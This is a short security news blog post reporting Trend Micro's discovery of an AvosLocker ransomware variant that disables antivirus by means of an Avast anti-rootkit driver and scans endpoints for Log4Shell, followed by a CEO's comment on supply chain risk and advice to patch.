New AvosLocker Variant Disables AV To Evade Detection

Trend Micro researchers have discovered a new variant of AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. This is the first sample observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file. The ransomware is also capable of scanning multiple endpoints for Log4Shell.

Chris Olson, CEO of The Media Trust had this to say:

“Like many other ransomware attacks from recent memory, the new AvosLocker variant targeted a vulnerable third-party service (in this case, a web-based password locker). As organizations come to rely more and more on digital tools and services to run their business, they should learn about the dangers of digital supply chain attacks and continually monitor their partners to enforce trust and safety standards. Just as AvosLocker evades detection in the course of a breach, Web and mobile apps are increasingly targeted by cyber actors using sophisticated techniques such as obfuscated and polymorphic code to dodge blockers or URL filters.”

The fact that this new variant leverages Log4Shell, and takes such evasive action shows how dangerous this variant is. Thus it means that you should make sure you are completely updated in terms of any security patches and antivirus definitions so that you don’t become the next victim of this variant.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: